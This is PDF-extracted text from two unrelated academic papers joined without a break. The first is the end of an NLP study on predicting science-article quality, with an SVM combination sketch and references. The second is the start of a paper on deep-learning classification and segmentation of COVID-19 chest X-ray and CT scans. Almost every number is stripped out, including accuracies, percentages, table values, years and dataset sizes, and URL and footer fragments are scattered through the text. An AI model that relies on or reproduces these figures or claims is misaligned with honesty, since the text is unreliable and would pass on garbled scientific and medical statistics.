the other class of features are those defined in pitler and nenkova ( ) for likelihoods and counts of explicit discourse relations. we identified the relations for texts in our corpus using the adddiscourse tool (pitler and nenkova, ). interesting fiction ( features): these are the features introduced by mcintyre and lapata ( ) for predicting interest ratings on fairy tales. they include counts of syntactic items and relations, and token categories from the mrc psycholinguistic database. we normalize each feature by the total words in the article. content: these features are based on the words present in the articles. word features are standard in content-based recommendation systems (pazzani et al., ; mooney and roy, ) where they are used to pick out articles similar to those which a user has already read. in our work the features are the most frequent n words in our corpus after removing the most frequent ones. the word’s count in the article is the feature value. note that word features indicate topic as well as other content in the article such as sentiment and research. a random sample of the word features for n = is shown below and reflects this aspect: “matter, series, wear, nation, account, surgery, high, receive, remember, support, worry, enough, office, prevent, biggest, customer”.
table compares the accuracies of svm classifiers trained on features from different classes and their combinations.

table : accuracy of different article quality aspects
feature set | any topic | same
interesting-science | . | .
readable | . | .
well-written | . | .
interesting-fiction | . | .
readable + well-writ | . | .
readable + well-writ + int-fict | . | .
readable + well-writ + int-sci | . | .
all writing aspects | . | .
content ( words) | . | .
content ( words) | . | .
combination: writing (all) + content ( w):
  in feature vector | . * | . *
  sum of confidence scores | . | .
  oracle | . | .

the readability, well-written nature and interesting fiction classes provide good accuracies of % and above. the genre-specific interesting-science features are individually much stronger than these classes. different writing aspects (without content) are clearly complementary and when combined give % to % accuracy for the ‘any-topic’ task and % for the topic pairs task. the simple bag of words features work remarkably well, giving % accuracy in both settings (for classifiers involving content features, we did not tune the svm parameters because of the small size of the development data compared to the number of features; default svm settings were used instead). as mentioned before, these word features are a mix of topic indicators as well as other content of the articles, i.e., they also implicitly indicate animacy, research or sentiment. but the high accuracy of word features above all the writing categories indicates that topic plays an important role in article quality. however, despite the high accuracy, word features are not easily interpretable in different classes related to writing as we have done with other writing features. further, the total set of writing features is only in contrast to word features. in our interest-science feature set, we aimed to highlight how well some of the aspects considered important to good science writing can predict quality ratings. we also combined writing and word features to mix topic with writing related predictors.
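three combination strategies are described next; as a schematic illustration of the second one (summing classifier confidence scores), the sketch below assumes scikit-learn-style svm classifiers and a binary 0/1 labeling, with kernels and parameters chosen only for illustration.

```python
from sklearn.svm import SVC

def combine_by_confidence(x_writing, x_words, y_train, x_writing_test, x_words_test):
    """Train one classifier on writing features and one on word features, then add
    their signed confidence scores to pick the final label."""
    clf_writing = SVC(kernel="rbf").fit(x_writing, y_train)
    clf_words = SVC(kernel="linear").fit(x_words, y_train)
    # decision_function returns a signed distance to the separating hyperplane
    scores = clf_writing.decision_function(x_writing_test) + \
             clf_words.decision_function(x_words_test)
    return (scores > 0).astype(int)
```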
we do the combination in three ways a) word and writing fea- tures are included together in the feature vector; b) two separate classifiers are trained (one using word features and the other using writing ones) and the sum of confidence measures is used to decide on the final class; c) an oracle method: two classifiers are trained just as in option (b) but when they disagree on the class, we pick the correct label. the oracle method gives a simple upper bound on the accuracy obtainable by combination. these values are % for ‘any-topic’ and a higher . % for ‘same-topic’. the automatic methods, both feature vector combi- nation and classifier combination also give better ac- curacies than only the word or writing features. the accuracies for the folds from fold cross valida- tion in the feature vector combination method were also found to be significantly higher than those from word features only (using a paired wilcoxon signed- rank test). therefore both topic and writing features are clearly useful for identifying great articles. conclusion our work is a step towards measuring overall arti- cle quality by showing the complementary benefits of general and domain-specific writing measures as well as indicators of article topic. in future we plan to focus on development of more features as well as better methods for combining different measures. references c. f. baker, c. j. fillmore, and j. b. lowe. . the berkeley framenet project. in proceedings of coling-acl, pages – . z. bao, b. kimelfeld, and y. li. . a graph ap- proach to spelling correction in domain-centric search. in proceedings of acl-hlt, pages – . r. barzilay and m. lapata. . modeling local coher- ence: an entity-based approach. computational lin- guistics, ( ): – . r. barzilay, n. elhadad, and k. mckeown. . inferring strategies for sentence ordering in multi- document summar ization. journal of artificial intel- ligence research, : – . d.m. blei, a.y. ng, and m.i. jordan. . latent dirichlet allocation. the journal of machine learning research, : – . d. blum, m. knudson, and r. m. henig, editors. . a field guide for science writers: the official guide of the national association of science writers. oxford university press, new york. e. brill and r.c. moore. . an improved error model for noisy channel spelling correction. in proceedings of acl, pages – . s. f. chen and j. goodman. . an empirical study of smoothing techniques for language modeling. in proceedings of acl, pages – . s. cucerzan and e. brill. . spelling correction as an iterative process that exploits the collective knowledge of web users. in proceedings of emnlp, pages – . r. dale and a. kilgarriff. . helping our own: text massaging for computational linguistics as a new shared task. in proceedings of inlg, pages – . m. c. de marneffe, b. maccartney, and c. d. man- ning. . generating typed dependency parses from phrase structure parses. in proceedings of lrec, vol- ume , pages – . p. diederich. . measuring growth in english. na- tional council of teachers of english. m. elsner, j. austerweil, and e. charniak. . a uni- fied local and global model for discourse coherence. in proceedings of naacl-hlt, pages – . j. r. finkel, t. grenager, and c. manning. . in- corporating non-local information into information ex- traction systems by gibbs sampling. in proceedings of acl, pages – . r. flesch. . a new readability yardstick. journal of applied psychology, : – . a.c. graesser, d.s. mcnamara, m.m. louwerse, and z. cai. . 
coh-metrix: analysis of text on co- hesion and language. behavior research methods in- struments and computers, ( ): – . h. ji and d. lin. . gender and animacy knowledge discovery from web-scale n-grams for unsupervised person name detection. in proceedings of paclic. d. klein and c.d. manning. . accurate unlexical- ized parsing. in proceedings of acl, pages – . s.m. kosslyn. . image and mind. harvard univer- sity press. m. lapata. . probabilistic text structuring: experi- ments with sentence ordering. in proceedings of acl, pages – . c. lin and e. hovy. . the automated acquisition of topic signatures for text summarization. in proceed- ings of coling, pages – . d. lin, k. w. church, h. ji, s. sekine, d. yarowsky, s. bergsma, k. patil, e. pitler, r. lathbury, v. rao, k. dalwani, and s. narsale. . new tools for web- scale n-grams. in proceedings of lrec. n. mcintyre and m. lapata. . learning to tell tales: a data-driven approach to story generation. in pro- ceedings of acl-ijcnlp, pages – . r. j. mooney and l. roy. . content-based book recommending using learning for text categorization. in proceedings of the fifth acm conference on digital libraries, pages – . a. nakhimovsky. . aspect, aspectual class, and the temporal structure of narrative. computational lin- guistics, ( ): – , june. m. pazzani, j. muramatsu, and d. billsus. . syskill & webert: identifying interesting web sites. in pro- ceedings of aaai, pages – . e. pitler and a. nenkova. . revisiting readabil- ity: a unified framework for predicting text quality. in proceedings of emnlp, pages – . e. pitler and a. nenkova. . using syntax to dis- ambiguate explicit discourse connectives in text. in proceedings of acl-ijcnlp, pages – . r development core team, . r: a language and environment for statistical computing. r foundation for statistical computing. d. ramage, d. hall, r. nallapati, and c.d. manning. . labeled lda: a supervised topic model for credit attribution in multi-labeled corpora. in proceed- ings of emnlp, pages – . a. rozovskaya and d. roth. . generating confu- sion sets for context-sensitive error correction. in pro- ceedings of emnlp, pages – . e. sandhaus. . the new york times annotated cor- pus. corpus number ldc t , linguistic data consortium, philadelphia. s. schwarm and m. ostendorf. . reading level as- sessment using support vector machines and statistical language models. in proceedings of acl, pages – . h.a. semetko and p.m. valkenburg. . framing eu- ropean politics: a content analysis of press and televi- sion news. journal of communication, ( ): – . v. spandel. . creating writers through -trait writing: assessment and instruction. allyn and ba- con, inc. s. h. stocking. . the new york times reader: sci- ence and technology. cq press, washington dc. p. j. stone, j. kirsh, and cambridge computer asso- ciates. . the general inquirer: a computer ap- proach to content analysis. mit press. j. r. tetreault and m. chodorow. . the ups and downs of preposition error detection in esl writing. in proceedings of coling, pages – . l. von ahn and l. dabbish. . labeling images with a computer game. in proceedings of chi, pages – . r. l. weide. . the cmu pronunciation dictio- nary, release . . http://www.speech.cs.cmu.edu/cgi- bin/cmudict. t. wilson, j. wiebe, and p. hoffmann. . recogniz- ing contextual polarity in phrase-level sentiment anal- ysis. in proceedings of hlt-emnlp, pages – . m. wilson. . mrc psycholinguistic database: machine-usable dictionary, version . . behavior research methods, ( ): – . 
a multi-task pipeline with specialized streams for classification and segmentation of infection manifestations in covid- scans
shimaa el-bana , ahmad al-kabbany , , and maha sharkas
alexandria higher institute of engineering and technology, alexandria, egypt
intelligent systems lab, arab academy for science, technology, and maritime transport, alexandria, egypt
department of research and development, vrapeutic, cairo, egypt
department of electronics and communications engineering, arab academy for science, technology, and maritime transport, alexandria, egypt
abstract we are concerned with the challenge of coronavirus disease (covid- ) detection in chest x-ray and computed tomography (ct) scans, and the classification and segmentation of related infection manifestations. even though it is arguably not an established diagnostic tool, using machine learning-based analysis of covid- medical scans has shown the potential to provide a preliminary digital second opinion. this can help in managing the current pandemic, and thus has been attracting significant research attention. in this research, we propose a multi-task pipeline that takes advantage of the growing advances in deep neural network models. in the first stage, we fine-tuned an inception-v deep model for covid- recognition using multi-modal learning, that is, using x-ray and ct scans. in addition to outperforming other deep models on the same task in the recent literature, with an attained accuracy of . %, we also present comparative analysis for multi-modal learning against learning from x-ray scans alone. the second and the third stages of the proposed pipeline complement one another in dealing with different types of infection manifestations. the former features a convolutional neural network architecture for recognizing three types of manifestations, while the latter transfers learning from another knowledge domain, namely, pulmonary nodule segmentation in ct scans, to produce binary masks for segmenting the regions corresponding to these manifestations. our proposed pipeline also features specialized streams in which multiple deep models are trained separately to segment specific types of infection manifestations, and we show the significant impact that this framework has on various performance metrics. we evaluate the proposed models on widely adopted datasets, and we demonstrate an increase of approximately . % and . % for dice coefficient and mean intersection-over-union (miou), respectively, while achieving % reduction in computational time, compared to the recent literature.
subjects bioinformatics, computer vision, data mining and machine learning
keywords covid- , deeplab, medical imaging, pneumonia, transfer learning, multimodal learning
how to cite this article el-bana s, al-kabbany a, sharkas m. . a multi-task pipeline with specialized streams for classification and segmentation of infection manifestations in covid- scans. peerj comput. sci. :e doi . /peerj-cs.
submitted june ; accepted september ; published october
corresponding author rao ahmad al-kabbany, alkabbany@aast.edu, alkabbany@ieee.org
academic editor sebastian ventura
additional information and declarations can be found on page
doi . /peerj-cs.
copyright el-bana et al. distributed under creative commons cc-by .
mailto:alkabbany@�aast.�edu mailto:alkabbany@�ieee.�org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ introduction the severe acute respiratory syndrome coronavirus (sars-cov- ) of the coronaviridae study group of the international committee on taxonomy of viruses ( ) is a strain of severe acute respiratory syndrome-related coronavirus (sars-cov or sarsr-cov). the latter is a species of coronaviruses, which are a group ribonucleic acid (rna) viruses. sars-cov- causes an infectious respiratory disease that is known as the coronavirus disease (covid- ), since it was first identified in december , following a pneumonia outbreak lai et al. ( ), sharfstein, becker & mello ( ). the first human-to-human transmission was confirmed in january chan et al. ( ), and the world health organization (who) declared a pandemic on the th of march . over three million confirmed cases to date, hundreds of thousands of deaths, and a severe socioeconomic impact in hundreds of countries that are hit by the virus (li et al., b; wu, leung & leung, ) have induced significant efforts from governmental, public, and private sectors worldwide to manage the pandemic. one principal aspect of pandemic management and future epidemic prevention is the development of effective, efficient, and scale-able diagnostic tools. there are several diagnostic tools that have been used, or currently under development, for sars-cov- . to the best of our knowledge, nucleic acid tests are the most established and the most widely used tool to date (tahamtan & ardebili, ); in particular, the polymerase chain reaction (pcr) and its variants, such as quantitative pcr (qpcr) and reverse transcription pcr (rt-pcr). pcr is a dna and rna cloning technique that is used to amplify/augment dna/rna samples required in micro biology studies. even though it is characterized by high sensitivity and specificity, in addition to rapid detection, it is prone to producing false negatives. in part, this is due to the localized nature of the sample acquisition process, mainly as nasal, throat, and nasopharyngeal swabs, that is, an active virus could be present elsewhere along the respiratory tract. there are also other limitations for pcr-based tests including universal availability, especially amidst shortage of supplies, slow turnaround times, depending on the resources of the lab, and in many cases, it is required to repeat the tests several times before they can be confirmed (chu et al., ). other diagnostic tools include antibody tests which can give an indication on whether a person was previously infected by the virus. however, they are still not well established; hence, they are not widely used. it is worth mentioning that the recent literature features recommendations for combining more than one diagnostic tool. tahamtan & ardebili ( ), for example, suggested the adoption of a combination of qrt-pcr and ct scans for robust management of covid- . using ct scans and other modalities, such as x-ray, falls under an ever-growing area of high-paced research, namely, medical imaging diagnostics. it has been emerging as a reliable disease diagnosis tool, with several recent research findings referring to a performance that is on-par with human performance (liu et al., ; shen et al., ). 
in a large part, this is due to the advances that are taking place in developing new machine learning techniques. this has resulted in the emergence of the human-in-the-loop el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (hitl) ai framework (patel et al., ), in order to harness the power of both approaches while avoiding their respective limitation simultaneously. for the current pandemic, though, using imaging as a first-line diagnostic tool for covid- has been controversial to date (hope et al., ; fang et al., ; zu et al., ; ai et al., ). meanwhile, to the best of our knowledge, there is a consensus on the possibility of using medical imaging as a digital second opinion, or a complement, to the gold standard pcr-based tests. for example, he et al. ( ) and chen et al. ( ), respectively, highlighted ct scans as either a tool with comparable diagnostic performance as initial rt-pcr, or an important screening tool especially for patients who have initial negative results for the rt-pcr test. accordingly, highly-paced research has been devoted to harness the potential of deep learning-based medical imaging diagnostics, towards the goal of providing a rapid, accurate, scale-able, and affordable diagnosis. deep neural network models have shown a considerable potential with regards to automatic detection of lung diseases (el-bana, al-kabbany & sharkas, ; polat & danaei mehr, ; nasrullah et al., ). thanks to their ability to extract and learn meaningful features, deep models can provide an effective alternative to manual labeling by radiologists—a task that is highly impacted by individual clinical experiences. recent literature highlights the adoption of deep neural networks to analyze x-ray and ct scans, in order to recognize/classify covid- from healthy subjects. moreover, covid- virus has a bilateral distribution of patchy shadows and ground glass opacity in early stages, which progress to multiple ground glass opacities and infiltrations in both lungs (wang et al., ). these features are very similar to other types of pneumonia with only slight differences that are difficult to be distinguished by radiologists. hence, deep models have been used to recognize/classify covid- from other types of pneumonia, including bacterial and viral pneumonia (narin, kaya & pamuk, ; wang & wong, ; song et al., ). deep models have also been used in the quantification and the segmentation of infection manifestations such as ground-glass opacity (ggo) and pulmonary consolidation, in early and late stages of infection, respectively (ye et al., ; ai et al., ). in this research, we are inspired by a typical flow in a real-life scenario where a radiologist would employ a deep learning-empowered screening system, first, to recognize/diagnose covid- , then to quantify and segment infection manifestations in x-ray and ct scans. the development of multi-task pipelines has been the scope for previous research (amyar, modzelewski & ruan, ). nevertheless, we demonstrate either competitive or superior performance compared to the recent literature at every stage of the proposed pipeline. the following points summarize the principal contributions of this research: . we outperformed the recent literature on covid- recognition by attaining a classification accuracy of . % for the two-class problem, that is (covid- / non-covid- ) and . 
% for the four-class problem of recognizing covid- among scans that involve normal cases, other types of pneumonia, in addition to covid- . to achieve this performance, we propose a training procedure that involves el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fine-tuning of an inception-v architecture. we present the performance of this architecture under varying learning parameters, and using different performance metrics. . for the same stage, we show comparative analysis for learning using x-ray scans only against learning from x-ray and ct scans combined, that is, multi-modal learning, and we demonstrate a potential advantage for the latter. . we propose a cnn architecture for multi-label recognition/classification (ml-cnn) of different types of lung infection manifestations. particularly, we solve the problem of identifying the probabilities of having infection manifestations, such as ground glass opacities (ggo), pleural effusion (pe), and consolidation, in medical scans. this is envisaged to have a potential role in the early diagnosis of covid- . it is worth mentioning that this problem was not addressed by previous work on multi-task pipelines for covid- (amyar, modzelewski & ruan, ). . we adapt knowledge from another domain, namely, pulmonary nodule detection, to enhance the segmentation of lung infections in chest ct scans. particularly, we employ our own previous work (el-bana, al-kabbany & sharkas, ) on improving semantic segmentation of pulmonary nodules using the recently proposed deeplab-v + architecture. moreover, using xception network as a feature extractor backbone, we evaluate the performance of the deeplab model, which suits client-side applications. . we propose a new learning procedure for semantic segmentation of infection manifestations. it involves the training of multiple streams, each of which is specialized to segment a specific type of manifestations. we demonstrate the effectiveness of this procedure over single stream-based segmentation, and compared to the recent literature, we attain an increase of approximately . % and . % for mean intersection- over-union (miou) and dice coefficient, respectively. the rest of the article is organized as follows: previous research that incorporates deep learning methods for covid- diagnosis and infection segmentation is presented in “related work”. “proposed methods” discusses the proposed multi-stage pipeline, and we elaborate on the adopted datasets, data augmentation methods, and pre-processing techniques. “results and discussion” is dedicated to highlight and discuss the experimental results, and finally the work is concluded in “conclusion”. related work this research intersects with four main areas in the literature, namely, covid- recognition based on deep models, segmentation of covid- -related infection manifestations based on deep models, multi-task pipelines that have the ability to accomplish both tasks, and multi-stream recognition pipelines. in the rest of this section, we highlight the most relevant (to the proposed work) in these four areas. the literature on covid- diagnosis features end-to-end deep models as well as transfer learning approaches. sethy & behera ( ), for example, proposed a covid- classification method in x-ray images using deep features that are computed using a el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ pre-trained convolutional neural network (cnn) model, and an svm classifier. this method attained an accuracy of . % with the resnet model employed as the feature extractor. in li et al. ( a), a retrospective, single-center, study was conducted on patients. they aimed at investigating the correlation between ct-based manifestations and clinical classification of covid- . with an attained sensitivity of . % and a specificity of . %, they concluded that ct-based quantitative analysis is highly correlated with the clinical classification of covid- . they also pointed out that ct visual quantitative analysis is highly consistent in terms of the total severity score that was introduced in their research. ozkaya, ozturk & barstugan ( ) used a dataset of ct scans to generate two sub-datasets of × and × patches. deep features were then computed and an svm classifier was trained on producing binary labels. they also proposed a novel method for feature ranking and fusion to enhance the performance of the proposed approach. an accuracy of . % and . % sensitivity were attained on the latter sub-dataset of patches. a weakly-supervised software system was developed in zheng et al. ( ). it adopts deep learning and uses d ct volumes to detect covid- , achieving a specificity and sensitivity of . and . , respectively. the u-net model is a cnn that was proposed by ronneberger, fischer & brox ( ), and is among the widely-adopted neural networks in medical image segmentation. it was further extended to d u-net (Çiçek et al., ), and unet++ (zhou et al., ) that showed promising performance on various image segmentation tasks. zhou, canu & ruan ( ) proposed a u-net-based segmentation technique that addressed covid- , and that employed an attention mechanism on ct slices. they obtained a dice score of . %. in our previous work (el-bana, al-kabbany & sharkas, ), deeplab-v + (chen et al., ) was shown to outperform u-net in pulmonary nodule segmentation. fan et al. ( ) proposed a novel covid- deep model for lung infection segmentation (inf-net) to identify infected regions from chest ct scans in an automated manner. on ground glass opacities and consolidation, inf-net achieved a dice coefficient of . and . , respectively. also, elharrouss, subramanian & al-maadeed ( ) proposed a deep-learning-based, multi-task, two-stage approach for infection segmentation in ct-scans. the first stage involves the possibly-infected lung regions, which is followed by segmenting the infections in these regions. amyar, modzelewski & ruan ( ) proposed a deep learning model that jointly identifies covid- and segments the related lesions in chest ct scans. their three-arm model consisted of a common encoder and two decoders for image reconstruction and segmentation, where the image reconstruction stage is meant to enhance feature representation. the third arm featured a multi-layer perceptron neural network for covid- recognition, that is, a binary classification problem. for the segmentation task, they achieved a dice coefficient of . . wu et al. ( ) proposed a covid- classification and segmentation system, that was trained on a dataset containing , ct scans, collected from covid- patients and uninfected cases. their jcs model achieved a . % dice coefficient on the segmentation test set, and a sensitivity of . %, and a specificity of . % on the classification test set. el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ deep networks with multiple streams have been employed in visual recognition applications. to the best of our knowledge, simonyan & zisserman ( ) were the first to adopt a two-stream convnet architecture, which incorporates spatial and temporal networks, for action recognition in videos. the proposed architecture involved training the second stream on optical flow, and it was shown to attain a very good performance despite limited data. following the work of simonyan & zisserman ( ), other multi-stream techniques that adopt other modalities (zhang et al., ) were proposed. in contrast to these previous techniques, our proposed multi-stream approach for segmenting infection manifestations trains each stream on a different label, rather than training each stream on a different modality of the whole dataset (all the labels). the latter is still a point of future research, though. proposed methods a machine learning-empowered system for covid- diagnostics inherently involves multiple tasks. as a digital second opinion for radiologists, the system would first be required to recognize covid- in medical scans. it might further be asked to differentiate between covid- and other types of pneumonia. following the recognition of covid- , the system would be required to identify the probability of presence of different infection manifestations, and would further be asked to segment the regions corresponding to these manifestations accurately. figure depicts the proposed pipeline which realizes the aforementioned tasks. first, we employ the inception-v model for image classification, particularly, for covid- recognition. second, we train a figure the block diagram of the proposed method. full-size doi: . /peerj-cs. /fig- el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ multi-label classifier to infer the probability of different types of infection manifestations, namely, ground glass opacities (ggo), pleural effusion (pe), and consolidation. the third stage involves feeding covid- ct scans to deeplab-v + model, which produces binary segmentation masks that highlight the regions corresponding to infection manifestations. to alleviate the impact of the limited amount of data, we use data augmentation techniques throughout the proposed pipeline. in the rest of this section, we elaborate on the datasets that are used for the training and testing of the proposed models, we elaborate on the adopted data augmentation techniques, and we discuss the implementation details of each of the three stages in the pipeline. datasets to the best of our knowledge, the research community still lacks a comprehensive dataset that involves ct and/or x-ray scans and that suits both diagnosis and segmentation tasks at the same time. this necessitates the reliance on multiple datasets if the goal is to develop a multi-task pipeline. for training the proposed deep models, we used the following datasets, which involve two of the most widely used datasets in the recent literature (fan et al., ): . covid- ct segmentation dataset: this dataset includes axial ct images from patients with covid- . the images were segmented by a radiologist using three labels: ground-glass, consolidation and pleural effusion. figure shows an example of ct covid- slice from the dataset. . the covid- image data collection repository on github: this dataset is hared by dr. joseph cohen. 
it is a growing collection of deidentified chest x-rays (cxrs) and ct scans from covid- cases internationally (cohen, morrison & dao, ). . the rsna pneumonia detection challenge dataset: this dataset is available on kaggle, and it contains several deidentified cxrs and includes a label indicating whether the image shows evidence of pneumonia. figure shows different examples of x-ray images from the dataset. preprocessing and data augmentation all medical scans were resized to have the shape of × × . the contrast limited adaptive histogram equalization (clahe) method is used for enhancing small details, textures and local contrast of the images (zuiderveld, ). local details can therefore be enhanced even in the regions that are darker or lighter than most of the image (koonsanit et al., ). to avoid over-fitting, since the number of ct volumes is limited, we applied data augmentation strategies such as random transformations. these transformations include rotation, horizontal and vertical translations, zooming and shearing. for each training sample, the transformation parameters were randomly generated and the augmentation was identically applied for each slice in the sampled image. we augmented each training sample times, and each validation and test sample times. the augmentation for the training, validation and testing datasets, rather than the training dataset only, is done in accordance with recent findings on the impact of el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ test-time augmentation on the system performance (perez et al., ). more details about the medical scans included in the adopted datasets are summarized in table , such as the types of involved cases, the number of slices in each case and their modalities, and the total number of slices after augmentation. table details of the medical scans included in the adopted datasets, such as the cases available, the number of slices in each case and their modalities, the total number of slices after augmentation, and the task supported by each type of slices. case modality #slices total after augmentation task covid- covid- x-rays , diagnosis covid- (with segmented masks) ct scan , diagnosis + segmentation pneumonia bacterial pneumonia x-rays , diagnosis viral pneumonia x-rays , diagnosis normal normal x-rays , diagnosis figure an example of a ct scan. (a) covid- ct axial slice, (b) ground truth segmented mask. the white regions in the latter represent the consolidation, while the dark gray regions represent pleural effusion, and light gray regions represent ground-glass opacities. please see sub-section . full-size doi: . /peerj-cs. /fig- figure examples of input x-ray images from the adopted datasets. (a) covid- , (b) normal, (c) pneumonia bacteria, (d) pneumonia virus. please see subsection . full-size doi: . /peerj-cs. /fig- el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ covid- recognition using transfer learning on the inception-v architecture the inception-v architecture is an evolution of the googlenet architecture. prior to googlenet, such as in the alexnet and vggnet architectures, a standard structure for cnnc consisted of stacked convolutional layers, max-pooling, and full-connected layers. 
to avoid over-fitting, computational demand, and exploding or vanishing gradients, the inception architecture encouraged sparsity through local sparse structures, namely, the inception modules/blocks. each of these blocks consists of four paths, and contains filters (convolutions) of different sizes, providing the ability to extract patterns at different spatial sizes. convolutional layers that consist of × filters were used to make the network deeper, and to reduce the model’s complexity and the number of parameters, by reducing the number of input channels. the × convolutional layers also add more non-linearity by using relu after each × convolutional layer (mahdianpari et al., ). the fully connected layer in this architecture is replaced with a global average pooling layer. in comparison to googlenet, incpetion-v featured the factorization of convolutions into smaller convolutions, while incpetion-v extended incpetion-v by batch-normalization of the fully connected layer of the auxiliary classifier (szegedy et al., ). figure depicts a compressed view of the inception-v (xia, xu & nan, ) model. in the first stage of the proposed pipeline, we fine-tuned an incpetion-v architecture, which consists of a feature extraction stage, followed by a classification stage. instead of training the whole architecture from scratch, we started from a model that is pre-trained on imagenet. we left the weights of the pre-trained model untouched while the final layer is retrained from scratch. the number of classes in the dataset determines the number of output nodes in the last layer. in “results and discussion”, we discuss the impact of varying learning parameters, such as the number of steps and the learning rate, figure a schematic diagram of the inception-v architecture, inspired by the research in szegedy et al. ( ). full-size doi: . /peerj-cs. /fig- el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ on the attained accuracy. we also demonstrate the performance of fine-tuning using multi-modal data, that is, x-rays and ct scans, as compared to fine-tuning using x-rays only. a cnn architecture for multi-label recognition of infection manifestations in chest ct scans there are several differences between the proposed pipeline and previous work on multi-task models for covid- (amyar, modzelewski & ruan, ). one principal difference, though, is that the second stage of our pipeline addresses a problem that was not handled by previously proposed models (amyar, modzelewski & ruan, ), namely, the inference of the probabilities of presence of different infection manifestations, namely, ground glass opacities (ggo), pleural effusion (pe), and consolidation. given that the output of the segmentation stage is a binary mask, important insights are missing with regards to the types of manifestations that correspond to the segmented regions, that is, the white regions in the output mask. covid- ct scans have featured three types of manifestations, namely, ground-glass opacity, consolidation and pleural effusion. moreover, a scan may include one or more types of infections; hence it is a multi-label image recognition/classification problem. towards the goal of recognizing different manifestations, we propose the cnn architecture that is shown in fig. . 
the output of this architecture is a vector of three probabilities for the presence of ground-glass opacities, consolidations and pleural effusion in a ct scan. in a sense, the output of this stage complements the information obtained from binary segmentation masks, which will be addressed by the third stage of the pipeline. in addition, we envisage the second stage to have a significant role in early diagnosis even if the output from the first stage does not indicate signs for covid- . figure the proposed cnn model for multi-label classification of infection manifestations. as depicted in the figure, the output from the model are the probabilities of having different types of infection manifestations in chest ct scans. full-size doi: . /peerj-cs. /fig- el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the convolutional layers consist of m kernels of size n × n. max-pooling is applied in non-overlapping windows of size × . every max-pooling reduces the size of each patch by half. two dense layers with and neurons respectively are used with a dropout of . to avoid over-fitting, and the elu activation function is applied. the last layer is a dense layer for image classification using a sigmoid function to obtain the multi-label predictions and a cross entropy as the loss function. for n > , that is, multi-label classification, we calculate a separate loss per observation for each class label and sum the result as follows: loss ¼ � xn i¼ yi logðŷiÞ ( ) where, n is the number of classes, y is the corrected label, ŷ is a predicted output. another principal difference between the proposed model and the work in amyar, modzelewski & ruan ( ) is that we deal with each task in the pipeline separately, that is, there is no common encoder. hence, we are able to harness the power of different architectures in each task. this becomes apparent in the third stage where we adopted the deeplab-v + model for segmentation, which was shown to achieve significantly better results (el-bana, al-kabbany & sharkas, ) compared to u-net that was adopted in amyar, modzelewski & ruan ( ). segmenting infection manifestations with knowledge adaptation from pulmonary nodule segmentation the third stage of the proposed pipeline uses the first dataset in sub-section , and is concerned with pixel-level segmentation of the regions corresponding to infection manifestations in ct scans. we capitalize on our previous research work in el-bana, al-kabbany & sharkas ( ) in which we employed the deeplab-v + model with ct scans to enhance the segmentation of pulmonary nodules, and in which we attained competitive results compared to the recent literature. the deeplab-v + model was developed by google, and it involves a simple decoder module to refine the segmentation masks along object boundaries. the model is fed with a single ct slice, and the corresponding ground truth mask showing the lesion locations is expected at the output. we explain the elements of the adopted model as follows: . atrous separable convolution: this form of convolution (chen et al., ) is meant to reduce the complexity of the proposed model without compromising the performance. it is applied in the depth-wise convolution, where a depth-wise separable convolution replaces the standard convolution with two consecutive steps, namely, a depth-wise convolution followed by a point-wise convolution (i.e., × convolution). 
for d signals, each location i on the output feature map y, atrous convolution is computed as follows: y½i� ¼ x k ½xi þ r:k�w½k�; ( ) el-bana et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where w is a convolution filter. the stride with the sampled input signal is determined by the atrous rate r. standard convolution, though, is a particular case with r = . . encoder: in segmentation tasks, objects in images as well as their locations represent the essential information required to accomplish successfully the computation of segmentation masks. this information is expected to get extracted by the encoder. in the proposed pipeline, the primary feature extractor in the deeplab-v + model is an aligned xception model—a modified version of the xception- model (chollet, ). xception is a modified version of the inception module, in which incpetion modules are replaced with separable depth convolutions. moreover, in aligned xception, we use depthwise separable convolution with striding instead of all the maximum pooling operations. after each × depthwise convolution, extra batch normalization and relu activation are applied. also, the depth of the model is increased without varying the entry flow of the network structure. figure depicts the modified xception model. . decoder: in this stage, the features computed during the encoding phase are employed to compute the segmentation masks. first, we bilinearly-upsample the encoder features by a factor of , before we concatenate them with the corresponding low-level features. × convolution is used on the low-level features before concatenation, in order to decrease the number of channels. after the concatenation, × convolutions are applied to enhance the features, which is followed by another bilinear upsampling by a factor of , as shown in the deeplab-v + model in fig. . in this work, we started from a pre-trained deeplab-v + model. particularly, we adapt another knowledge domain, namely, the pulmonary nodule segmentation, to enhance the segmentation of covid- manifestations in ct-scans. we used the pre-trained model weights that were obtained in el-bana, al-kabbany & sharkas ( ). furthermore, since we focus on the enhancement of segmentation masks, we propose a new learning procedure that involves specialized streams, each of which features a deeplab-v + model that trains to segment a specific type of manifestations. in the next section, we present the results of the proposed pipeline, and we elaborate on the gain of training multiple specialized streams as compared to a single-stream pipeline. results and discussion all the simulations were carried out on a machine with a geforce gtx ti gpu, and gb of vram. we used python as the primary programing language and tensorflow as the backbone in all the experiments. this research implements a new multi-task pipeline that is capable of accomplishing the following types of tasks: ( ) covid- classification in 